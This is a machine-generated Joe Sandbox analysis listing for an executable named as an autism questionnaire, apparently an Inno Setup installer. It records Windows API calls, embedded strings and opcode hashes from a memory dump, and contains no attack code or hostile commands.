                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCloseHandleModuleProc
                                                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                              • API String ID: 4190037839-2401316094
                                                                                              • Opcode ID: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
                                                                                              • Instruction ID: b59d3067a1cffae51886ca0dc1f1740e66d40653876fb7099798d5cffc045aa9
                                                                                              • Opcode Fuzzy Hash: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
                                                                                              • Instruction Fuzzy Hash: 51214F34A04209AFDB10EAE5CC5AFFE7BE9FB48704F60486DA500F3681EE74AA45C755
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624D58,00000000, /s ",006D579C,regsvr32.exe",?,00624D58), ref: 00624CC6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseDirectoryHandleSystem
                                                                                              • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                              • API String ID: 2051275411-1862435767
                                                                                              • Opcode ID: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                                                              • Instruction ID: 4609d961d1e6a6c9b50d20a9c17260b7e2f4bf46ee5c2bafd069b1c5a14d41a0
                                                                                              • Opcode Fuzzy Hash: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                                                              • Instruction Fuzzy Hash: 0B413F30A0061CABDB10EFE5D892ACDBBBAFF48304F51457EA504B7282DB746A05CF59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
                                                                                              • GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite
                                                                                              • String ID: <T@
                                                                                              • API String ID: 3320372497-2050694182
                                                                                              • Opcode ID: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                                                              • Instruction ID: ee5667e1a227ecbea5375e2fa2ea65b47cf69c4a4a195d8f09788a9c4629ec5a
                                                                                              • Opcode Fuzzy Hash: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                                                              • Instruction Fuzzy Hash: 5701A9A16046147DE610F3BA9C4AF6B279CCB0976CF10463B7514F61D2C97C9C548B7E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCapture.USER32 ref: 005B83B6
                                                                                              • IsWindowUnicode.USER32(00000000), ref: 005B83F9
                                                                                              • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
                                                                                              • SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
                                                                                              • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                              • String ID:
                                                                                              • API String ID: 1994056952-0
                                                                                              • Opcode ID: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
                                                                                              • Instruction ID: fa2d834c3aada0f77e9407d785ac3e39b975c7e98aa55159218471e4f58a832a
                                                                                              • Opcode Fuzzy Hash: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
                                                                                              • Instruction Fuzzy Hash: 3C21BFB520460A6F9A60EA99CD40EE777DCFF44744B105829B999C3642DE14F840C765
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                                                              • Instruction ID: 5d66737b0d4da92f98c0db807105cf356bd4b4b1c4874a50b8b8aa415a59ee3b
                                                                                              • Opcode Fuzzy Hash: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                                                              • Instruction Fuzzy Hash: D1C134A2710A004BD714AB7D9C8476FB286DBC5324F19823FE645EB3D6DA7CCC558B88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615941
                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615968
                                                                                              • SetForegroundWindow.USER32(?,00000000,00615C40,?,00000000,00615C7E), ref: 00615979
                                                                                              • DefWindowProcW.USER32(00000000,?,?,?,00000000,00615C40,?,00000000,00615C7E), ref: 00615C2B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostWindow$ForegroundProc
                                                                                              • String ID: ,hm$Cannot evaluate variable because [Code] isn't running yet
                                                                                              • API String ID: 602442252-4088602279
                                                                                              • Opcode ID: 45c3d4c65d1ec2b60b52e47b4900782b425ab5755711cce607cb4ac74d550e22
                                                                                              • Instruction ID: a4d9e41ba68ff62660f6698438dd6fdd69331843db6522f8d42236939986de27
                                                                                              • Opcode Fuzzy Hash: 45c3d4c65d1ec2b60b52e47b4900782b425ab5755711cce607cb4ac74d550e22
                                                                                              • Instruction Fuzzy Hash: F691BC34A04704EFD711DF69D8A1F99FBB6EB89700F19C4AAF8059B7A1C634AD80CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringWrite
                                                                                              • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                              • API String ID: 390214022-3304407042
                                                                                              • Opcode ID: 705ed7cc5398cbe28157da632e506f3351768adff860ab0ed1cfb64a8e1f6eff
                                                                                              • Instruction ID: 9ccae61fee5444c96898e798bd08ad00ad1f0a42c005b5ee0ec7678d9f590d11
                                                                                              • Opcode Fuzzy Hash: 705ed7cc5398cbe28157da632e506f3351768adff860ab0ed1cfb64a8e1f6eff
                                                                                              • Instruction Fuzzy Hash: 3E810974A44209AFDB04EBE5C882BDEBBB6EF88304F504669E400B73D1E775AE45CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB
                                                                                              • GetTickCount.KERNEL32 ref: 00408E4F
                                                                                              • GetTickCount.KERNEL32 ref: 00408E67
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00408E96
                                                                                              • GetTickCount.KERNEL32 ref: 00408EC1
                                                                                              • GetTickCount.KERNEL32 ref: 00408EF8
                                                                                              • GetTickCount.KERNEL32 ref: 00408F22
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00408F92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$CurrentThread
                                                                                              • String ID:
                                                                                              • API String ID: 3968769311-0
                                                                                              • Opcode ID: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                                                              • Instruction ID: 216a2c916ba6e2f13aacbc2b486a5202febe2ca6ab096472d485461ede499aa8
                                                                                              • Opcode Fuzzy Hash: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                                                              • Instruction Fuzzy Hash: FD4171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • PeekMessageW.USER32 ref: 005B8604
                                                                                              • IsWindowUnicode.USER32 ref: 005B8618
                                                                                              • PeekMessageW.USER32 ref: 005B863B
                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005B8651
                                                                                              • TranslateMessage.USER32 ref: 005B86D6
                                                                                              • DispatchMessageW.USER32 ref: 005B86E3
                                                                                              • DispatchMessageA.USER32 ref: 005B86EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2190272339-0
                                                                                              • Opcode ID: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
                                                                                              • Instruction ID: 67b3953643da56f9c200822127d0531685f000c00b35d7cfb42a732a483186e2
                                                                                              • Opcode Fuzzy Hash: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
                                                                                              • Instruction Fuzzy Hash: 4921D83034478065EA312D2A1C15BFE9FDD6FF1B49F14545EF58197282CEA9F846C21E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                                                              • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandle$AttributesCloseCreateModule
                                                                                              • String ID: GetFinalPathNameByHandleW$kernel32.dll
                                                                                              • API String ID: 791737717-340263132
                                                                                              • Opcode ID: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
                                                                                              • Instruction ID: 33e75e3eedf917459a19461fb92274fc6dcf6f547d9e1cd84d4496d1484fa6be
                                                                                              • Opcode Fuzzy Hash: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
                                                                                              • Instruction Fuzzy Hash: FD110860740B043FE530B17A5C8BFBB204E8B96769F14013ABB1ADA3C2E9799D410D9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
                                                                                              • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressErrorHandleLastModuleProc
                                                                                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                                              • API String ID: 4275029093-79381301
                                                                                              • Opcode ID: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                                                              • Instruction ID: fae384035c4cbf403bb6e842233c038de7d928fc1d1ef8a2a4529768a9174d83
                                                                                              • Opcode Fuzzy Hash: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                                                              • Instruction Fuzzy Hash: E4117570D05208AEEF10EBA5DA45A6EB7F4DB44704F1084BFE454B72C1DF7D8A548B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 005CE27D
                                                                                                • Part of subcall function 004EE238: EnterCriticalSection.KERNEL32(?,00000000,004EE4A7,?,?), ref: 004EE280
                                                                                              • SelectObject.GDI32(00000001,00000000), ref: 005CE29F
                                                                                              • GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
                                                                                              • GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
                                                                                              • ReleaseDC.USER32 ref: 005CE2F2
                                                                                              Strings
                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CE2AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                              • API String ID: 1334710084-222967699
                                                                                              • Opcode ID: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                                                              • Instruction ID: 68d2e7468c57547273e36bf030651d7f5f3d68c5ac32077f2b8cb66f1dd3ef54
                                                                                              • Opcode Fuzzy Hash: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                                                              • Instruction Fuzzy Hash: 8E01847AA14204BFE704DEE9CC42F9EB7ECEB49704F510469F604E7280D678AD008724
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0060F6D8: GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                                                                • Part of subcall function 0060F6D8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                                                              • SetForegroundWindow.USER32(?), ref: 006B817A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                              • String ID: %hm$(\m$Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.$bm
                                                                                              • API String ID: 3179053593-36556386
                                                                                              • Opcode ID: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                                                              • Instruction ID: d1bb377931262cf507ba46983c8bd46f5a1d5c2f393bef5d4bb5aec732555b7a
                                                                                              • Opcode Fuzzy Hash: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                                                              • Instruction Fuzzy Hash: 621130746042049FD700EB69DD86FE837EAAB49304F5540BAF401AB7A2CE79AC82C759
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite
                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                              • API String ID: 3320372497-2970929446
                                                                                              • Opcode ID: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                                                              • Instruction ID: a01582976990e38fcf300ac2ca1e4f1bd102d55210953f65d1fcb3aa769fb624
                                                                                              • Opcode Fuzzy Hash: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                                                              • Instruction Fuzzy Hash: 52F04FA0A44780BAEB10B7A19C07F7B261AD741B28F10567FB214B91D3C6B85CC49AE9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317D1
                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317ED
                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00431826
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004318A3
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318BC
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 004318F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                              • String ID:
                                                                                              • API String ID: 351091851-0
                                                                                              • Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                                              • Instruction ID: ede279f2d9249a03c5eeb803d5e3445196a0ad83b08d93498a0369a0c14e8414
                                                                                              • Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                                              • Instruction Fuzzy Hash: 41512D75A002299FCB62DB59CD81BD9B3FCAF0C304F4455EAE508E7212D634AF858F58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 006AE714
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B78BD,00000000,006B81F9), ref: 006AE743
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 006AE758
                                                                                              • SetWindowLongW.USER32 ref: 006AE77F
                                                                                              • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AE798
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AE7B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$Show
                                                                                              • String ID:
                                                                                              • API String ID: 3609083571-0
                                                                                              • Opcode ID: cbd293cfec67b64efc79bc9d205490811c8f395d7711b658bf93e82dc89e2f59
                                                                                              • Instruction ID: c5f2d3f14be40374ea6ae40072baf741f42d7864aa45c80e1917733d0618a2ec
                                                                                              • Opcode Fuzzy Hash: cbd293cfec67b64efc79bc9d205490811c8f395d7711b658bf93e82dc89e2f59
                                                                                              • Instruction Fuzzy Hash: FC111C75745200AFD700EB68DD81FE237EAAB9E314F4541A5F6158F3E2CA65EC40DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateFileHandle
                                                                                              • String ID: .tmp$Gtk$_iu
                                                                                              • API String ID: 3498533004-1320520068
                                                                                              • Opcode ID: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                                                              • Instruction ID: 38fd5bd3aef28e796ac18a57f9f91bd27b67d48edde35eb58a18837c564f9665
                                                                                              • Opcode Fuzzy Hash: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                                                              • Instruction Fuzzy Hash: 73319030E80209ABDB14EBE4C842BDEBBB5AF54308F118169E904B73D1D738AE458B55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                                              • ShowWindow.USER32(?,00000005,00000000,006B8C4E,?,?,00000000), ref: 006B89DE
                                                                                                • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                                                • Part of subcall function 00424020: SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B
                                                                                                • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                              • String ID: .dat$.msg$IMsg$Uninstall
                                                                                              • API String ID: 3312786188-1660910688
                                                                                              • Opcode ID: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
                                                                                              • Instruction ID: 43941ce92546cf1f75effb4615d96ab71b8b1f254b2d248514a95b56d5af6042
                                                                                              • Opcode Fuzzy Hash: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
                                                                                              • Instruction Fuzzy Hash: 65415CB0A002059FC700EFA4CD96E9EBBB6FB88304F51846AF400A7751DB75AE41DFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 006153C6
                                                                                              • SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00615463
                                                                                              Strings
                                                                                              • Failed to create DebugClientWnd, xrefs: 0061542C
                                                                                              • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 006153F2
                                                                                              • hSa, xrefs: 00615415
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd$hSa
                                                                                              • API String ID: 3850602802-2905362044
                                                                                              • Opcode ID: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
                                                                                              • Instruction ID: bd2b79d17f40968884fe1c372ced24de8c60c917dea0cb25488337d16b2a65e4
                                                                                              • Opcode Fuzzy Hash: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
                                                                                              • Instruction Fuzzy Hash: 391123B1A403129FE300EB28DC81FDABBD69F94304F08002AF5858B3D2D3749C84C766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 00624AD6
                                                                                              • GetExitCodeProcess.KERNEL32 ref: 00624AF9
                                                                                              • CloseHandle.KERNEL32(?,00624B2C,00000001,00000000,000000FF,000004FF,00000000,00624B25), ref: 00624B1F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                              • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                              • API String ID: 2573145106-3235461205
